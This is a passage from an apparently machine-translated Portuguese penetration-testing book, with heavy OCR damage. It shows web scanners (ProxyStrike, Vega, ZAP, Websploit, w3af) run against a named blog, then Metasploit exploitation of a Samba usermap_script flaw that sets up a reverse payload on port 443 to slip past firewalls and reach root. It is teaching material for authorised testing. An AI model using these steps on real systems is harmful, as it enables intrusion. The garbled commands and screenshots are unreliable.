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Para usar ProxyStrike, acesse Aplicações Web |Scanners de Vulnerabilidade Web e 

selecionar ProxyStrike. Assumindo que o seu navegador de Internet está enviando tráfego para 
ProxyStrike, 

você deve ver o tráfego capturado no Comms guia. Vamos passar mais tempo usando 

Proxies em Capítulo 6, ataques web. 


ProxyStrike v2.1 


Help 


Comms Request Stats Variable Stats Config Plugns Log Repeat Request Crawler 


Method Target 


itty twee hesecuntyblaggar Lom / 

http //googieads.g.doubleclkk. net /pagead/ads7client=ca-pub-32619169521 5207680utput=nort &h= 200k otnane=F5946 
nitp:/igoogleads g.doublectkk net  /pagead/ads7client=<a-pub-92619169521 520768.0utput=nord &n=500kslotrame= 21210 
http://qoogleads.g.doubleclkk.net /pagead/ads?client~ca-pub-926191695215207680utput=htri &h-500&slotname= 21210 


htn- Lineal centrar omc oe iraxal 
+ 


Post œ All Repeat Intercept Edit requests in view | Delete requests inview | Delete selected requests 


Target All S 


Path: All > 


merecem er eee eer 
Accept TexUncm appl atonisheri+ xml apple ston/uri:q=0.9,.*/* q=0,8 

User-Agent: Mozilla/S.O (Macintosh: Intel Mac OS X 10.8 rv: 20.0) Gecko! 20100101 Frefox/ 20.0 
Connection: close 

Cocke __utma= 2537458300 1757255857 1366923731 1367354074 1374097140 3; 


Responses | Requests 


__utmz = 253748300, 1 3669 23731,1.1.unncs =(drect}lutmecn=(drect)jutmemd=(none) 
--ca=P0-2019225104-1366923733115 —utmb=253748300.1.10.13974097146, _utmce=253744300 


Co 


As características de esteira são uma maneira fácil de digitalizar um site alvo para SQL ou SSL e 
Vulnerabilidades XSS do plugin. Você não tem que ter ProxyStrike configurado como um proxy para 
usar os recursos de esteira. Para executar a função de rastreador em um site com plugins XSS, 
clique no Plugins guia, vá até as velas de XSS e selecione para ativar os plugins 

usando a caixa de seleção. Em seguida, selecione a guia rastreador. Entre no site da meta, incluindo 
http://, Verifique o rastreamento usando a caixa de plugins e clique no grande Pare botão 

mudá-lo para Em execução. Adicionando os plugins irá aumentar o tempo para completar uma 
digitalizar. ProxyStrike exibirá uma barra de status fornecendo uma estimativa de quanto tempo uma 
varredura 

deve tomar. 


Comms Request Stats Varable Stats Config Plugins 
k 
Plugin selection; | XSS & 55| attacks $ | 


¥ enable 
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Comms Request Stats Variable Stats Config Plugins Log Repeat Request | Crawler 


Uniq Froms 
Stopped | 


M Crawl using plugins 


Url; (http://www. thesecurityblogger.com 


| 
| g% Not Running 


Reset 


ProxyStrike v2.1 


ij Plugins keg | Repeat Request) Center 


Uniq Froms 
Pepe w.thesec uritybs ogge.com f 
httpajwww.thesecurityblogger.com 
Mtawa (hesecurity blogger. comTp=20084 comments 
© Crow using plugins hetp:smnw thesecuritybiogger com/?p= 20584 more-2068 
hat pulwww.tesecurity bogger.cory7attacimenk_ié-2070 
Mtp Awww Desecuritybiogger comiPattachmerk id=2071 
paul | 4733253 htt powwew.thesecurity blogger. com/?p=2008 
hetpawwew, hesecurityblogger. com? p=20984comments 
httpcaliwww. esecurity blogger com? p= 2098-4 more-2098 
Nii puww w. Desecuritybiogger comiTattacimert ié=2100 
herpes a hesecurity logge comy/?attachment_|d=2099 
httpywww. thesecurity biogger.com/?p=20398 
rtp thesecunty blogger com/?p= L903 4commernts 
harpa, Mesecuritybiogger com/Pattactwnent_id= 1999 
PEERAA N hesecurityogger. comy?attachment_id- 1996 
hittpywww. thesecurityblogger.com/?attachmert_id=2113 
ritpuwww, (hesecurityblogger.com/Tattacimert_id=1992 
hitm/www. thesecuritybtogger com/Tattachmert_it=2112 
htp tnesecuritybtogger. comy?attachment_id=2) 11 
Crawling process: The crawling process is performed by TWO threads Net pew. Dhesecuritybiogger.com/Pp=2123$respord 
hittpy/www. thesecurityblogger. com/Tattachmert_id=2127 
to avoid web server overloading. bitpulwww, thesecurity blogger. com/?p=21234more-2123 
ritp.wwew, thesecuntybogger.comy7attachmert_id=-2126 
The urls detected can be forwarded to enabled plugins. harpa Mesecurity dogger. comiTattadimerk id=2125 
Moreover detected forms are shown in the table and can be filled lind electrician tener bene xtra eric 


httpujwww.thesecurityblogger.com/?p=21614 comments 
masually by double-clicking on each ink. Enjoy! 


Uri: | Nite (Aa Dnesecunity blogger cor 
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O Plugins guia mostra os resultados de um rastreamento após uma varredura é lançado. 
Ataques 


identificados podem ser exportados via HTML ou XML. 


Plugin selection: | XSS & SSI attacks v Reset cache 


| Export HTML || Export XML 


enable Request threads a pa 


o ERES injections Available 


= hittpyiwwi.thesecuntyblogger. com) tcat=242 


= hitpyiwww.thesecuntyblogger. comyTtag=the-belancing-act 


' (Singe Quotes | (Normal Encading) 


[ ) (Parenthesis) (Normal Encoding) 
= hittpyiwww chesecoritybloggercomyTp=2068 


= http-www.thesecuntyblogger.comyfatachmnem_ id=2071 

attachmert_id GET 
= Wttpc/iwww.thesecuntyblogger.comy?page ki=2 

page id GET 
= httpviwww thesecuntyblogger. cany?feed=comments-ss2 


feed E () (Parenthesis! (Normal Encoding) 


O Log guia mostra quais as tarefas que estao sendo executadas em site de destino eo nivel 


de sucesso para cada ataque. Este arquivo pode ser copiado para um arquivo de texto para um 
produto final. 


O Crawler guia lista todos os links da web únicos identificados associados a um alvo. 


Log output; 


Trying sql Injection on: [ URL: http;/www.thesecurty blogger. com/wp- 
includesfsthickbox/thickbox.|s?véer=3.1-20121105 | 


Trying ver.. 
thttett ttt ttt ttt ++ FINISH XSSSS ttt tet ett t +t ttt tt 
[ URL: http://www.thesecurityblogger. com/wp-includes/js/thickboxthickbox.js?ver=3.1-20121105 ] 
FEES E PTET ETT TTT tet ett t tr ttt tt tttttttttttttttttttt+ 


Stab 2 - DONE 
URL is STABLE 


ProxyStrike oferece outros recursos úteis. Mais sobre ProxyStrike pode ser encontrada em 
http://www .edge-security.com/proxystrike.php. 
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Vega 


VEGA 10 


Vega é uma ferramenta de teste de segurança utilizado para indexar um site e analisar o conteúdo 
da página para 

encontrar as ligações, bem como parâmetros de formulário. 

Para iniciar Vega, ir para Aplicações Web |Scanners de Vulnerabilidade Web e selecione 

Vega. Vega vai piscar um banner de introdução e exibir uma GUI. 


Subgraph Vega 
File Scan Window Help 


e dr O scareer & Proxy 


E Website View eo © Scan Info =o 


| @ VEGA 


Oz G 


© Scn Alerts Scan Alert Summary 


aa Identities E 


Proxy is not running 71M of 248M 0 
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Vega tem Scanner e Procuração guias no canto superior direito. Para usar Vega como um scanner, 
clique no Scanner aba no canto superior direito, clique em Digitalização no canto superior esquerdo, 
e selecione para começar a nova verificação. 


Fie Scam Window Help 


q + © Scammer 8 Proxy 


@ Website View “0 O Sean info 
e. 

> BS www thesecurityblogger cc 

G 

+ a 


Você verá um campo de entrada pedindo o alvo. O exemplo a seguir é alvo 
www thesecurityblogger.com. Escolha o seu destino e clique em Em seguida: 


Scan Target 


* Enter abase URI for scam 
Nttpihwww thesecurityogger.c mi 


Choose a target scope for scan 


As próximas seções são opções que você pode avaliar o seu alvo contra. Existem dois principais 
módulos (injeção e Processamento Response) com muitas opções para fazer a varredura contra. 
Clique na pequena cenoura em cada módulo, selecione as opções que você deseja procurar, 


e clique em Avançar. 
Select Modules 
Chosee whirh scanner modules to analia for thus an & VE 


Select modules to run 
7 = Injection Modules 

Format Streg imectmn Checks 

Cross Domon Poiky Auditor 

XML Iryector check 

Biro SOL Text inector Direret Crecks 

ASS ingecton checks 

integer Overtiow inertan Checks 

Shall kyection Checks 

Bind OS Command Inpction 


Remote Fhe lrebude Checks 


Bind SGL iqectan Timmy Analysn Checks 


Directors Ustno and Traversal Checks 
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As duas imagens seguintes oferecer a possibilidade de adicionar os cookies e os padrões de 
exclusão 

para evitar a difusão, que são ambos opcional. Você pode deixar os padrões e clique em 
Próximo para ambas as telas. Clique em Acabamento para iniciar a digitalização. 


Vega vai exibir as pesquisar e mapear as vulnerabilidades ativos encontrados para o nível de risco 
que representam para o sistema de destino. 


File Scan Window Help 
os 
@ website View as @ Sean Info 
+ - 


> pi thesecurityblogger “g 


VEGA 


Scanner Progress 


EA GE D115 AA O 
“O ASTES72013 08:2119 [Ayd 
http://www. thesecuritybloggercompwp-includes/ms-fu 


0 httoc!fwwew.thesecuritybl og 
119 out of 151 scanned (78.8%) 


b O medium ($5) 
> O Low (12) 
> O info (106) Scan Alert Summary 
7 © 05/09/2013 10:48:57 [Cancal 
> Q httpotw ww. thesecurityblo¢ o 


O medium (95 found) 


A janela superior esquerda intitulado Ver Website exibe o alvo (s) que está sendo digitalizado 

e outros alvos associados com o alvo principal. A parte inferior da janela esquerda 

intitulado Digitalizar Alertas mostra as categorias de vulnerabilidades encontradas. Você pode 
clicar 

sobre os acentos circunflexos ao lado dos alertas para ver o que vulnerabilidades Vega encontra. 
Quando você 

clicar em qualquer vulnerabilidade, Vega apresenta uma definição do que é encontrado com um 
explicação detalhada de seu possível impacto. 
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A figura a seguir mostra uma possível vulnerabilidade de script cross-site em 
www thesecurityblogger.com: 


É Website View 


eian 


P @ www. thesecurityblagger.c¢ B 
ra r 


+a 
re 
as 


mtormation 
fwp-inctudes/admin-bar.piw 


P REQUEST 


= © 05/18/2013 08:71:19 [Aud GY pp iiaa tind seh 


hd o http ihwww.thesecurityo 


T @meaum os) > RESOURCE CONTENT 


v + Local Filesystem Pa 
+} shoma/turktribe/thesecuritybloggar.com/vwp- inc ludas /aduin-bar.php 


+ iwp-inciiudesiaut b DISCUSSION 


* fwprincLudesicar vegas has detected a possible absolute filesystem path (Le one that ts not relates to the web 
rootl, This information is sensitive, as it may reveal things about the server ermeronment to an 


Vega do Procuração seção fornece a capacidade de ver os pedidos e respostas 
um site de destino. O Procuração seção será preenchida como ocorre uma varredura. 


nitp:/fwww.thesd GET /wp-contents 200 
pair | Ep | 

| http iferares,thvesy SET | dp -includes/ | 209 
| Nttpitwww.thesd GET | fxmirps.pnp | 200 
| http itwww.thesy| GET | fwp-includes/js/ | 200 
inetpufwww,thesd GET — | /wp-includes/them! 200 
| 


= E | E 
a Responsa 
ütie» Joey Muniz - The Security Blagger</title> 
stank rat="profile” heat="httpcf/greg.orgtxtnft 1" i> 
clink rel="erylesheet” type= text/css" media="all" href= http www, thesecurityide 


clink rel=" alternate" type=" application/rsstxmt" utle="The Security Blogger &raquil 
<link rel='stylesheet id='thickbox-css' href= http://www. thesecurityblogger.com/w 
cinik rel='styleshest'id='gdsr ste mancsa href= http thesecurtyblagge 

asw 2781 perystal¥ 23s lpdarkness 4235] poxyqens?2 i slquxygen_glS23slppans2) 

exticss' medism all /> 3 -j 

eink rel='stylesheet id='qdsr .stÃo. xtra-css' href 
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Vega oferece detalhes sobre vulnerabilidades encontradas no visor central, bem 
como uma página de resumo. Esses detalhes podem ser copiados para um resultado final. 


O Medium (196 found) 


Loca Filesystem Paths Found 
PHP Errar Datected 


Possible Source Code Disclosure 

O tow (34 found) 
Orectory Usting Detected 
Internal Addresses Found 

O nto (119 found] 


News Feed Detected 
Blank Body Detected 
Possible AJAX code detected 


Character Set Not Spec#ied 


OWASP-Zap 


OWASP-Zap também conhecido como Zaproxy é um proxy interceptar projetado para a segurança 
testes de aplicações web. 


Abrir Zaproxy, indo para Aplicações Web |Aplicações Web fuzzers e 
selecionando owasp-zap. Haverá um aviso pop-up que deve ser aceito para começar 
o programa. 


Ao aceitar o aviso de licença, OWASP-Zap vai abrir e exibir outro pop- 

perguntando se você gostaria de criar um certificado SSL da CA raiz. Isto permite Zaproxy 

para interceptar o tráfego HTTPS sobre SSL em um navegador. Isto é importante para aplicações de 
teste 

que usam HTTPS. Para gerar um certificado SSL, clique no Gerar botão. 


OWASP ZAP 


SM Root CA certilicate 
SSL wont work f you haven't created and enported an 
OWASP ZAP Cá root certificate, You can create sucha 
centicate any time m the options menu, so you do not have 
to create ft right now 


Generate Goto cptions pane! and create certificate nom 


Laker Not now, but create certificate later 
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Haverá uma janela que aparece pedindo para gerar ou importar um certificado. Você 

pode gerar um certificado clicando em Gerar. Você pode salvar o novo certificado 

clicando no Salvar e selecionar onde você deseja colocá-lo. O novo arquivo de certificado é 
chamado owasp cap root ca.cer. 


+ Options 
Active Scan 
AJAX Spider 
Anti CSAF Tokens 
API 
Applications 
Authentication 


Rrosknainte 


BEGIN CERTIFICATE 
MITDEDCCAT Cy Mw TEA) TEN + ZqT ANBgk qhk i GWOBAQUFADCB9j EnMCLIGAL 
TIGSUL Agwe Vk LEFOSSE; ay BOcs 4e SDS 250 LENE SPA YDVOGHDA ONT] 
2 MTE MPE AP DIQOE DA] PVOFTUCAS 2907 ENB GAYDVOOLDEFP YO 
QVAgLin De dCRDQTEL Mak GAL UERN MC espa e MMT MaNT ASM) ERN} ADE CAMT 
Hi EZN) AGW) CBg) EnMELIGAT LE Ave TI JSU Agire Vb TEFOd GF) ayBOceS4e5 
TENSITY VE AYDVOONDACE NT gw ZTIyY ZM ka HRY wF AYOVOCK DAL PYDFTUC 
Save KENEH o GAY DVOOL DEP P Vo TUBO Alim Sy dCBDITEL Mak GAl VEBhHCeM 
MANGOES GST SOCEBAQUA AGT HOw Awp PK As TBAOCSGuby Izp] Ha EPT Sam 
~ oo hs I2G) xy fT TST bGRhggnhcEl HEZ8I "Do 00H01) dOBBO730/4/t j wG/ SKY 
| aj Desktop | | È SbPENDA Cf pOSEEbgdop37) c45SHDAf agzFers WOTIKOS4I¥ Opl OC jS3Es 
TR i TE : DO PRPUOOT NH) t + Eben Vut JS0k aEVy Tk ArT TLCxbqBaHet Eai nh SawebRage 
ne Lj swt ft eNREMESSVi ycAneS7ZIGIHdS Pi / 29p JErOHeg] VIBSL apGeo 
ster-Lists AO ,MO. word IFMA IOR UCA ET RGN EUKne YHOHE2) ) t ze Tps EU IAM SG SSXK QU / 
1 AO.M10.hash AAG) ZOBLMBOGALUdDgONBESTIEbEL TL MP Bu fey Be rr lUGPK IK? APBgNVIS 
sh-2.10b 40.M10.word BT ADAOH/ MAs GALUdDe OE Aw I Bt J AJ BoNVHSUBMDAsBg gr BP Doc DA OT IK 
wT CBEU JON OGY KO ZTh v CNADEFROAD gg ERAPSGHt Bj Vn Za Dy dCRgent 
shoutput complete. 1 9pCXHAS Hu RKI wC dr Pj /pak Mep /epTPrHaNSyVELSvZOTACZARZSK SN 
ash complete wold | (PROG) /mOCT Ger ThoOdl FHyir + AIN SZx0ZEaGgShnool 1t sHPr3Idy 
SeyzZGgqyx3k54PB0InITIDt2w4 IFORE Mk JOV+ Cos + NABhhTT 4ul Ug gsm 
Pa Hs s0tMGVCEcPucERUCA r ak J9zZAnp / 2M) I /Mign Sv Of Biutlryfek 
Mur Tab e /twk PN/ r SKULOM/uk2GwOc bb Tk Oy SOTKBESD pal PPS FRA dp) 

END CERTIFICATE 


owasp Zap root cacer 


Uma vez que você salvou o arquivo de CA, clique em Ok e abrir o seu navegador. Para o Firefox, 
falir Editar |Preferências e clique no Avançar guia. Clique no Criptografia 

sub-aba e clique em Exibir certificados. Em seguida clique em Importação e selecione o certificado 
você gerada em Zaproxy (o . Cer arquivo). Firefox irá perguntar em quem confiar com o 

novo Autoridade de Certificação. Confira todas as três opções, que são sites de confiança, e-mail 
desenvolvedores de usuários, e software. Clique em Ok duas vezes. 


You have been asked to trust a mew Certificate Authority (CA). 


Do you want to trust “OWASP Zed Attack Proxy Root CA” for the following purposes? 
Trust this CA to identify websites. 
(A Trust this CA to identify email users, 


Trust this CA to identify software developers, 


Before trusting this CA for any purpose, you should examine its certificate and its policy 
and procedures (if available). 


Examine CA certificate 
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O próximo passo é configurar o Firefox para procuração todo o tráfego através Zaproxy. Faça isso 
, indo para Editar, Preferências, selecionar o Avançado guia e, em seguida, selecionando o 

Rede guia. Clique no Configurar botão, clique em Configuração manual de proxy, 

tipo localhost e porta 8080, Que é o padrão para Zaproxy. Clique no 

caixa ao lado Use este servidor proxy para todos os protocolos e clique em OK. O 

tela a seguir demonstra essa configuração: 


Connection Settings 


Configure Proxies to Access the Internet 


No proxy 
Auto-detect proxy settings for this network 
Use system proxy settings 
è Manual proxy configuration 
HTTP Proxy ocalhost Port 


Y) Use this proxy server for all protocols 


No Proxy for 


st. ] 


Example mozilla.org net.nz, 192.168.1.0/24 


Automatic proxy configuration URL 


Abra Zaproxy e vocé deve ver uma Sites janela no lado superior esquerdo. Esta vontade 
preencher como vocé navegar na Internet usando o Firefox. Vocé pode ver todos os pedidos e 
respostas para cada pagina na janela da direita. Zaproxy da uma visao facil de todos 

Os recursos que estao sendo utilizados por cada pagina. 
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Você também pode fazer uma avaliação específica de um site, indo para o início rápido 


janela e digitando em um site na URL para atacar espaço. A sequência 
Screenshot é Zaproxy executar uma verificação de www.thesecurityblogger.com: 


Lintitied Session - OWASP ZAP 


Bile Edt vaw Anshme Raport Took Onine Help 


Standard modo js) di E OOO , spo v 
Er | Quad start ge Requestes | Responses | frank J | 
O Estas 

Welcome to the OWASP Zed Attack Proxy (ZAP) 


ZAP js an saty to use rtegrated penetration testes tool tor inang vwirerabiities im web aoplications, 


Pease be aware that you should ony mtace appications that you have neen specifically Deen green pert 


Te quctly test an application. enter ts UAL below and press ‘Aitac 


UPL to attack Mito ews thesecurityblegger. com 


F sto Ei Stop 


Progress Spider the UAL to discover tha cortant 


For a more in depth teat you should eqiiore your apelic ation using your browser or automated regress 


Ppr Am me te bem arene detaile 


mistory %™ | Sooreh j Greek Points XC Jers | = “Atuo Scan À | 
Forced Browse y | Fomor $ Params |” Hitp Sessions s$ AJAX Speier 5 Outpt 


te) www. thesecurityblogger.comc@o > Ww iif 


Processos Method um 
E hes (warn tnesacurtyslogçer com 
Nite: new these cuntytieg oer cem; 
Nae Linen. these curntytleg per com pege dad 
Hie iineew.thesecurtytiogoer comilpagese? 
hite (wren thes ecurtytieg ger comfpe2620 


Nons RO DO 2 AI 


Zaproxy ira realizar um rastreamento de aranha do site da meta identificar todas as 
links associados com o alvo, bem como varredura em busca de vulnerabilidades. Para ver o 
vulnerabilidades, clique no Alertas guia. 


Spider dé i Forced Browse 4* | Fuzer @ | Params [|] | Http Sessions = 
History = Search À, Break Points JË 


Cross-domain JavaScript source file inclusion 
URL tpw thesecurityologger.com 
Pick: Low 
. «ai di Bellabiity Warning 
» BF Private P disclosure (3) Parameter https:/iapts. google com/siplusone,s 
» E  X-Content-Type-Options header missing (91) Attack: 
> al R xFrame-Options header not set (91) Description: 


vir 


Note-se que Zaproxy não automatizar a autenticação por padrão. Tudo o login 
solicitações falhará usando uma varredura automática se as configurações padrão estão 
habilitados. 
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Você pode configurar o login automático usando Zaproxy, no entanto, você terá que primeiro 
registrar manualmente em um site enquanto Zaproxy está habilitado, diga Zaproxy onde o 
login e logoff são pedidos e habilitar o recurso de auto-login. O GET solicitações 

será exibido na Sites janela e você deve destacar tanto o login e de logout 

respostas sob a Respostas guia clicando com o botão direito sobre a resposta, ao clicar em 
Assinalar como conteúdo e selecionar se é a de login ou logout. 


fate) O OOO | tuck Stat | Requester | Rasponseçs | Brock XX | O O O U U OO 
GET yuloader-domevent.pívi lá [Header Tæt [9] [Bacy: Tat Ju] mm | 
GET: cos.phptcdlangid,sheat,stylaid, td) 
SET; content php HTTP/1.1 200 OX 
* | i djb Date: Tue, 14 May 2013 13:19:53 GT 
_ CET: favicon ko Sarvar: Apache 
FLS forumrunmer X- Powa rad -Ey z P/5.3.19 
GET detects Cache-Control: private 
> imanes Pragma: private 
— nd Cat.Cncksse ms lactartiin tusDr aynireceled 14.Mau ZA 1512534 
W_aisaile_ajax = parsolnti mr, IST; 
POSTiprotie.phpidox do, s securitytoka SIMPLEVERSION = "421"; 
= Do http ' BBURL = thom. À 
+L Phtprim thesecurtyologger.com LOGGEDIN = 14335 > Of true : falso; 
> EE https matzstos men eme THIS SCRIPT = "Login"; 


> https R ; . — 


> Mipar 

> RÈ https: o 
4 a ps > : => . EncodefDecoda/ash... 
T T — Stak 
Forced Browse g | Fuer @ |_ Params i | | Http Sessions) |. 


History ™ Search 4 Break Points XÈ a 


Find.. 


@ Cross «tomain Jav: 

E ~ = URL: Fit pelted 
* ta Aerts 15) Risk: R tom 
» UE © Directory browsing (44) Ralebiny: Warring, 

Parameter: Mtpsilla 

>» DS Private P disclosure [93] Attack 
» ME = XCortent-Type-Options header missing (1635) Descrpbon | Select All cwlea 
> @ © xFrame-Options header not sat (1353) = 


The page at tha) Save Raw > lptries froma 
third-party doma 


at Se | 


Um icone com uma linha marrom aparecerá na barra de ferramentas representando automático 
autenticação. Clique sobre esse ícone para ativar a autenticação automática de modo que 
Zaproxy pode logar automaticamente em qualquer pedido de autenticação ao fazer uma 
avaliação automática de um alvo. Este recurso é útil para auto-explorar um site 

que requer autenticação. 


[93] 


Ataques do lado do servidor 


Zaproxy tem um lugar de mercado encontrado em Ajudar |Verificar atualizações que oferece outra 


características, que podem ser adicionados ao arsenal Zaproxy. 


Manage Add-ons 


Status | Name 

Release Fuzzdb files 

Beta BeanShell Console 

Beta Passive scanner rubes ... 

Bete Port Scanner 

Beta Report alert gonerator 
Script Console 
SVN Digger files 
Token generation and... 
TreeToo!s 
Active scanner rules (... 
Duff 
Highlighter 
Passive scanner rules ... 
SCIP - Control Event E... 
Server-Sem Events 


Description 

Fuzzdb v1.09 fles which can be used with the... 
Provides a BeanShell Console 

The beta quality Passive Scanner rules 

Allows to port scan a target server 


Allows you to generate reports for alerts you s.. 
Provdes dynaméc access to intemal ZAP data... 


SVN Digger files which can be used wth ZAP f... 


Allows you to generate and analyze pseudo ra... 


Tools to add functionality to the tree view, 
The alpha quality Active Scanner rules 
Displays a dialog showing the differences bet., 


Allows you to highlight strings in the request a... 


The alpha quality Passive Scanner rules 


identify, enumerate and activate dormant and... 
Allows you to view Server-Sent Events (SSE) co... 


É 


Un Whe NNN OW wt 


Zaproxy oferece diferentes opções de relatórios encontrados sob a Relatório guia. 


ep ort 


Tools Online Help 


Export Messages to Fila... 
Export Response to Fils... 
Export All URLs to File... 
Compare with another Session... 


Gener 


ate HTML Report... 


Generate XML Report.. 


Aqui estão exemplos de um relatório HTML para www.thesecurityblogger.com. 


wedomain Javas i 


The page at the talowing URL includes ara of more script Shas from a thiid-party damain 


herp aww tha sacury tile ager cam 


hips Wape googe commeplnone js 


Ensure Jea Script source thes are loaded hom oniy trusted sources, and the sources cant be controlled try end users of the application 


sedomain JavaS cipt source 


file inci 


The page at tha tofowing URL includes ara oF mera script tias from a third-party domain 


herp stew tha sa curtytilogger. cam 


Wip opamiz googesymdication compagead'show_nds js 


Ensure JavaScrpt source thee are loaded from only trusted sources, and the sources cant be controlled by end users of the application 
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Websploit 


Websploit é um projeto de código aberto usado para digitalizar e analisar sistemas remotos 
encontrar vulnerabilidades. 


Para acessar Websploit, ir ao abrigo Aplicações Web |Aplicações Web fuzzers e 

selecionar websploit. ATerminal janela pop-up com o Websploit bandeira. Você 

pode ver todos os módulos disponíveis eo que é necessário para executar um módulo específico por 
datilografia Mostrar módulos. 


ARP Cache Denial Of Service Attack 
, Maddle Finger Of Doom Attack 
twork /m Man In The Middle Attack 
rk / Man Left In The Middle Attack 
rk/webkiller TCP Kill Attack 
network/ fakeupdate Fake Update Attack Using DNS Spoof 
network/fakeap Fake Access Point 


Ex } todi Desi i€ 
exploit/autopwn Metasploit Autopwn Service 


exploit/browser autopwn Metasploit Browser Autopwn Service 
exploit/java applet Java. Applet -Attack- (Using HTML) 


Vescriptic 


wifi/wifi_janmer Wifi Jammer 
wifi/wifi dos Wifi Dos Attack 


Tipo USO seguido do módulo que você deseja e preencha os requisitos para executar. 
Por exemplo, para executar o Webkiller módulo, tipo usar a rede / Webkiller e encher 
no alvo para atacar o uso set TARGET comandos. Tipo RUN para executar o módulo. 


> use network/webkiller 
TARGET http://www) thesecuritybbogge f., dgn 


http://www. tThese@etirdtyhloq@er. com 


FsWebKiller > RUNG 
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Exploração 


Se um verificador da penetração investe tempo e recursos adequada durante o 
Reconhecimento de um alvo, o verificador da penetração deve acabar com uma lista de alvos 
com possíveis vulnerabilidades. O próximo passo é priorizar o valor de cada alvo para o seu 
missão, aproximando o nível de esforço necessário para explorar possíveis vulnerabilidades, 
e julgar o risco associado com a realização do ataque. A vulnerabilidade e 

exploração disponível em Kali são ideais para a identificação e exploração de vulnerabilidades 
encontrados durante o reconhecimento de servidores de aplicativos web. 


Metasploit 


O Metasploit quadro é uma das ferramentas mais populares para a exploração do lado do servidor 
ataques. É considerada uma das ferramentas mais úteis para testadores de penetração. HD Moore 
criado em 2008. Ele é usado como uma ferramenta de teste de penetração legítimo, bem como uma 
ferramenta 

utilizado por atacantes para realizar a exploração não autorizada de sistemas. 


Há uma abundância de fontes dedicado a ensinar como usar o Metasploit 
quadro. No contexto deste livro, vamos examinar como Metasploit é usado 
para a exploração do lado do servidor para testar aplicações web em potencial. 


n aa Nota para certificar-se de Postgres SQL e serviços Metasploit são iniciados. 
«1 {< Você pode fazê-lo digitando postgres serviço começar e serviço 
Y> início Metasploit no Terminal janela como root. 


O primeiro passo é abrir um console e digitar msfconsole para lançar Metsaploit. 
msfconsole é a forma mais popular para lançar Metasploit. Ele fornece um usuário 
interface para acessar o quadro Metasploit inteiro. Comandos básicos, como 
ajudar e exposição permitirá que você navegue através Metasploit. 


Note-se que existem outros métodos para lançar Metasploit como 
msfgui (Baseado em GUI) e msfcli (Linha à base de comando). 


Em adição aos comandos Metasploit, msfconsole permitirá que você invocar 
comandos do sistema operacional subjacente, como sibilo ou nmap. Isso é útil porque 
permite a um invasor executar tarefas rotineiras sem sair do console. 


Em nosso primeiro passo, vamos usar nmap para fazer a varredura da rede local. Os 
resultados podem 
será automaticamente adicionado no Metasploit usando um arquivo XML. 
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O comando que emitimos é: 


my.xml rede nmap-n-oX 


Vamos importar os nossos resultados de nmap em Metasploit usando o arquivo XML que criamos. 
Fazemos isso através do comando: 


db import my.xml 


Uma verificação rápida dos comandos do host mostra que a nossa importação é bem 
sucedida e 
Metasploit tem agora a nmap dados. 


Nós também irá emitir o serviços comando para ver os serviços disponíveis dentro 
Metasploit. O seguinte é um exemplo de saída do serviço comando: 


== ë 


Ataques do lado do servidor 


Você pode realizar a digitalização para nmap e importar o arquivo XML para o Metasploit 
banco de dados em uma única etapa usando o comando db nmap. No exemplo a seguir, nós 
está usando db nmap para digitalizar um host usando o nmap comandos. 


Podemos verificar que Metasploit tem a informação relevante na sua emissão de banco de dados 
O hospedeiros e serviços comandos. 


O serviços comando revela que estamos usando o compartilhamento de arquivos Samba. Vamos ver 
se podemos . 

procurar um exploit e tirar proveito disso. E importante notar que, embora 

estamos atacando um servidor web real, neste caso, não precisa necessariamente tentar 

para explorar uma vulnerabilidade web. Atacantes reais vai aproveitar todo o software 

rodando em um servidor web para acessar informações. 


Vemos vários exploits Samba disponível. Eles também têm rankings. Usaremos 

O usermap script explorar com uma excelente classificação. Este módulo explora o 
vulnerabilidade de execução de comando em versões de Samba 3.0.20 através 3.0.25rc3. 
Mais informações sobre este exploit pode ser encontrada em http:/Avww.metasploit.com/ 
modules / exploit / multi / samba / usermap script. 
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Uma vez que um exploit é selecionado, é preciso ver que informação é necessária antes de 
podemos executar o selecionado explorar. Fazemos isso através da identificação do requerido 
opções listadas na saída e selecionar uma carga útil que queremos entregar. Nós 

emitir o comando mostrar opções para ver as opções necessárias: 
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Podemos ver esse exemplo que precisamos de uma RHOST entrada. RHOST é o endereço IP 
do host remoto que estão atacando. Nós também precisamos selecionar a carga e definir o 
opções de carga útil. A carga útil é o código que injeta em si e executa o exploit. Desde 

a mesma vulnerabilidade pode existir usando vários métodos, podemos eventualmente ter 
várias cargas úteis para escolher. Para ver as cargas disponíveis, emita o exposição 

payloads comando. 


tiusermap s pt 


Uma vez que vemos uma carga que queremos usar, 0 próximo passo é usar a definir payload 
comando e colocar no nome do patch da carga que vemos. 
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Uma vez que a carga é definido, podemos emitir o mostrar opções comando novamente para verificar a 
opções específicas para a carga útil. 


Podemos ver isso de carga específico está nos pedindo para definir o LHOST e a LPORT. O 
LHOST é o host local ou sua caixa atacante Metasploit. A exploração faz o controle remoto 
sediar ligar de volta para o sistema de hospedagem Metasploit, por isso o host remoto precisa 
sabe o que o seu endereço de IP é. 


Além disso, é preciso definir a porta do host remoto irá usar para se comunicar com 

Metasploit. Muitos ambientes corporativos restringir portas de saída através de um firewall 

ou roteador. A melhor prática é usar uma porta comum, como porta 443, Uma vez que é geralmente 
reservados para o tráfego SSL, que a maioria das empresas permitem saída. Além disso, outra 
benefício do uso de porta 443 é que a maioria das organizações não inspecionar SSL. Nós achamos 
que 

utilização 443 como LPORT para a maioria dos ataques nos permite ignorar ferramentas de proxy 
interno um 

organização pode ter implantado. 
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Quando terminar de configurar as nossas opções, podemos escrever, explorar para executar o ataque. 
Quando 

o exploit é executado com êxito, você será conectado ao servidor remoto. Você pode 

executar qualquer comando e, neste exemplo, neste particular explorar dá acesso root. Raiz 

acesso significa acesso completo ao seu servidor remoto alvo. 


usermap script) 
16.189.° 
usermap s 


Usermap 


Existem vários exploram e carga opções disponíveis no quadro Metasploit. 
Certifique-se de rever as opções disponíveis no http:/www.metasploit.com/. 


w3al 


w3af (Abreviação de Aplicações Web Attack e Quadro de Auditoria) é um open-source 
scanner de segurança de aplicações web e ferramenta de exploração. W3af pode ser acessado em 
Avaliação de Aplicações Web |Scanners de Vulnerabilidade Web seleccionando w3af. 
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w3af oferece um assistente, no entanto, não é necessário para executar corretamente uma varredura. 
O primeiro 

passo ou está a criar um novo perfil ou aproveitando um perfil existente. Os perfis são utilizados 
para plugins de grupo que será executado em um alvo. w3af vem com algum grande defeito 

grupos como OWASP TOP10. Definições de plugins existentes serão exibidas em 

A janela Centro de como você selecioná-los, como o exemplo a seguir do OWASP 

Perfil TOP10. Você pode selecionar um perfil existente ou o novo perfil que você acabou de 

